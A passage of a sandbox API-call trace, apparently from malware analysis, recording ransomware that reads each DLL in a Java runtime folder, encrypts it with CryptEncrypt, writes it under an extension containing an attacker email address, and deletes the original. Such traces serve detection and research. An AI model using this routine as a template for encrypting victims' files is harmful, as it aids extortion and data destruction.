phKey=0x32af958*=0xac2eb0) returned 1 [0151.772] CryptSetKeyParam (hKey=0xac2eb0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.772] CryptEncrypt (in: hKey=0xac2eb0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0151.772] CryptDestroyKey (hKey=0xac2eb0) returned 1 [0151.772] WriteFile (in: hFile=0x2ec, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0151.773] CryptDestroyKey (hKey=0xac3170) returned 1 [0151.773] CloseHandle (hObject=0x2dc) returned 1 [0151.773] CloseHandle (hObject=0x2ec) returned 1 [0151.773] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jpeg.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jpeg.dll")) returned 1 [0151.775] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0151.775] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsdt.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0151.775] GetFileSizeEx (in: hFile=0x2ec, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=18496) returned 1 [0151.775] CloseHandle (hObject=0x2ec) returned 1 [0151.775] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsdt.dll")) returned 0x20 [0151.775] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsdt.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.775] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsdt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2ec [0151.775] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.775] SetFilePointerEx (in: hFile=0x2ec, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.775] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsdt.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0151.776] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2ff0) returned 1 [0151.776] CryptSetKeyParam (hKey=0xac2ff0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.776] ReadFile (in: hFile=0x2ec, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x4840, lpOverlapped=0x0) returned 1 [0151.851] CryptEncrypt (in: hKey=0xac2ff0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x4850, dwBufLen=0x4850 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x4850) returned 1 [0151.851] WriteFile (in: hFile=0x2dc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x4850, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x4850, lpOverlapped=0x0) returned 1 [0151.852] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac32b0) returned 1 [0151.852] CryptSetKeyParam (hKey=0xac32b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.852] CryptEncrypt (in: hKey=0xac32b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0151.852] CryptDestroyKey (hKey=0xac32b0) returned 1 [0151.852] WriteFile (in: hFile=0x2dc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0151.852] CryptDestroyKey (hKey=0xac2ff0) returned 1 [0151.852] CloseHandle (hObject=0x2ec) returned 1 [0151.853] CloseHandle (hObject=0x2dc) returned 1 [0151.942] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\jsdt.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jsdt.dll")) returned 1 [0151.959] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0151.959] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\mlib_image.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0151.961] GetFileSizeEx (in: hFile=0x2dc, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=653888) returned 1 [0151.961] CloseHandle (hObject=0x2dc) returned 1 [0151.961] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\mlib_image.dll")) returned 0x20 [0151.961] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\mlib_image.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.961] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\mlib_image.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0151.962] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.962] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.962] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\mlib_image.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0151.962] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac30b0) returned 1 [0151.962] CryptSetKeyParam (hKey=0xac30b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.962] ReadFile (in: hFile=0x2dc, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0x9fa40, lpOverlapped=0x0) returned 1 [0151.975] CryptEncrypt (in: hKey=0xac30b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x9fa50, dwBufLen=0x9fa50 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x9fa50) returned 1 [0151.975] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0x9fa50, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0x9fa50, lpOverlapped=0x0) returned 1 [0151.988] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac2d70) returned 1 [0151.989] CryptSetKeyParam (hKey=0xac2d70, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.989] CryptEncrypt (in: hKey=0xac2d70, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0151.989] CryptDestroyKey (hKey=0xac2d70) returned 1 [0151.989] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0151.989] CryptDestroyKey (hKey=0xac30b0) returned 1 [0151.989] CloseHandle (hObject=0x2dc) returned 1 [0151.989] CloseHandle (hObject=0x2f8) returned 1 [0151.989] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\mlib_image.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\mlib_image.dll")) returned 1 [0151.995] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0151.995] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcp120.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0151.995] GetFileSizeEx (in: hFile=0x2f8, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=660128) returned 1 [0151.995] CloseHandle (hObject=0x2f8) returned 1 [0151.995] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcp120.dll")) returned 0x20 [0151.995] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcp120.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0151.995] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcp120.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0151.995] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.995] SetFilePointerEx (in: hFile=0x2f8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0151.995] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcp120.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0151.996] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac32b0) returned 1 [0151.996] CryptSetKeyParam (hKey=0xac32b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0151.996] ReadFile (in: hFile=0x2f8, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0xa12a0, lpOverlapped=0x0) returned 1 [0152.155] CryptEncrypt (in: hKey=0xac32b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0xa12b0, dwBufLen=0xa12b0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0xa12b0) returned 1 [0152.156] WriteFile (in: hFile=0x2dc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xa12b0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xa12b0, lpOverlapped=0x0) returned 1 [0152.167] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac33f0) returned 1 [0152.167] CryptSetKeyParam (hKey=0xac33f0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0152.167] CryptEncrypt (in: hKey=0xac33f0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0152.167] CryptDestroyKey (hKey=0xac33f0) returned 1 [0152.167] WriteFile (in: hFile=0x2dc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0152.167] CryptDestroyKey (hKey=0xac32b0) returned 1 [0152.167] CloseHandle (hObject=0x2f8) returned 1 [0152.167] CloseHandle (hObject=0x2dc) returned 1 [0152.172] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcp120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcp120.dll")) returned 1 [0152.178] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0152.178] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr120.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0152.178] GetFileSizeEx (in: hFile=0x2dc, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=963232) returned 1 [0152.178] CloseHandle (hObject=0x2dc) returned 1 [0152.178] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr120.dll")) returned 0x20 [0152.178] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr120.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0152.178] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr120.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2dc [0152.178] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0152.179] SetFilePointerEx (in: hFile=0x2dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0152.179] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr120.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f8 [0152.179] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3170) returned 1 [0152.179] CryptSetKeyParam (hKey=0xac3170, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0152.179] ReadFile (in: hFile=0x2dc, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0xeb2a0, lpOverlapped=0x0) returned 1 [0152.273] CryptEncrypt (in: hKey=0xac3170, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0xeb2b0, dwBufLen=0xeb2b0 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0xeb2b0) returned 1 [0152.275] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xeb2b0, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xeb2b0, lpOverlapped=0x0) returned 1 [0152.296] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac32b0) returned 1 [0152.296] CryptSetKeyParam (hKey=0xac32b0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0152.296] CryptEncrypt (in: hKey=0xac32b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0152.296] CryptDestroyKey (hKey=0xac32b0) returned 1 [0152.296] WriteFile (in: hFile=0x2f8, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0152.297] CryptDestroyKey (hKey=0xac3170) returned 1 [0152.297] CloseHandle (hObject=0x2dc) returned 1 [0152.297] CloseHandle (hObject=0x2f8) returned 1 [0152.297] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\msvcr120.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\msvcr120.dll")) returned 1 [0152.628] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0152.628] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0152.628] GetFileSizeEx (in: hFile=0x2f0, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=829264) returned 1 [0152.628] CloseHandle (hObject=0x2f0) returned 1 [0152.628] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll")) returned 0x20 [0152.628] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0152.628] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0152.629] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0152.629] SetFilePointerEx (in: hFile=0x2f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0152.629] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0152.630] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac3430) returned 1 [0152.630] CryptSetKeyParam (hKey=0xac3430, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0152.630] ReadFile (in: hFile=0x2f0, lpBuffer=0x3675020, nNumberOfBytesToRead=0x110100, lpNumberOfBytesRead=0x32af97c, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesRead=0x32af97c*=0xca750, lpOverlapped=0x0) returned 1 [0152.647] CryptEncrypt (in: hKey=0xac3430, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0xca760, dwBufLen=0xca760 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0xca760) returned 1 [0152.648] WriteFile (in: hFile=0x2fc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xca760, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xca760, lpOverlapped=0x0) returned 1 [0152.662] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8ec, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af958 | out: phKey=0x32af958*=0xac3030) returned 1 [0152.662] CryptSetKeyParam (hKey=0xac3030, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0152.662] CryptEncrypt (in: hKey=0xac3030, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3675020*, pdwDataLen=0x32af918*=0x40, dwBufLen=0x40 | out: pbData=0x3675020*, pdwDataLen=0x32af918*=0x40) returned 1 [0152.662] CryptDestroyKey (hKey=0xac3030) returned 1 [0152.662] WriteFile (in: hFile=0x2fc, lpBuffer=0x3675020*, nNumberOfBytesToWrite=0xf2, lpNumberOfBytesWritten=0x32af960, lpOverlapped=0x0 | out: lpBuffer=0x3675020*, lpNumberOfBytesWritten=0x32af960*=0xf2, lpOverlapped=0x0) returned 1 [0152.662] CryptDestroyKey (hKey=0xac3430) returned 1 [0152.662] CloseHandle (hObject=0x2f0) returned 1 [0152.662] CloseHandle (hObject=0x2fc) returned 1 [0152.662] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\plugin2\\msvcr100.dll")) returned 1 [0152.669] CryptGenRandom (in: hProv=0xa968b8, dwLen=0x10, pbBuffer=0x32afa08 | out: pbBuffer=0x32afa08) returned 1 [0152.669] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\resource.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0152.670] GetFileSizeEx (in: hFile=0x2fc, lpFileSize=0x32af9a0 | out: lpFileSize=0x32af9a0*=15424) returned 1 [0152.670] CloseHandle (hObject=0x2fc) returned 1 [0152.670] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\resource.dll")) returned 0x20 [0152.670] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\resource.dll.id[b4197730-0115].[fileisafe@tuta.io].actin")) returned 0xffffffff [0152.670] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\resource.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2fc [0152.670] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0152.670] SetFilePointerEx (in: hFile=0x2fc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x32af940 | out: lpNewFilePointer=0x0) returned 1 [0152.670] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Java\\jre1.8.0_144\\bin\\resource.dll.id[B4197730-0115].[fileisafe@tuta.io].actin" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\resource.dll.id[b4197730-0115].[fileisafe@tuta.io].actin"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2f0 [0152.670] CryptImportKey (in: hProv=0xa968b8, pbData=0x32af8f8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x32af954 | out: phKey=0x32af954*=0xac2db0) returned 1 [0152.670] CryptSetKeyParam (hKey=0xac2db0, dwParam=0x1, pbData=0x32afa08, dwFlags=0x0) returned 1 [0152.670] ReadFile (in: 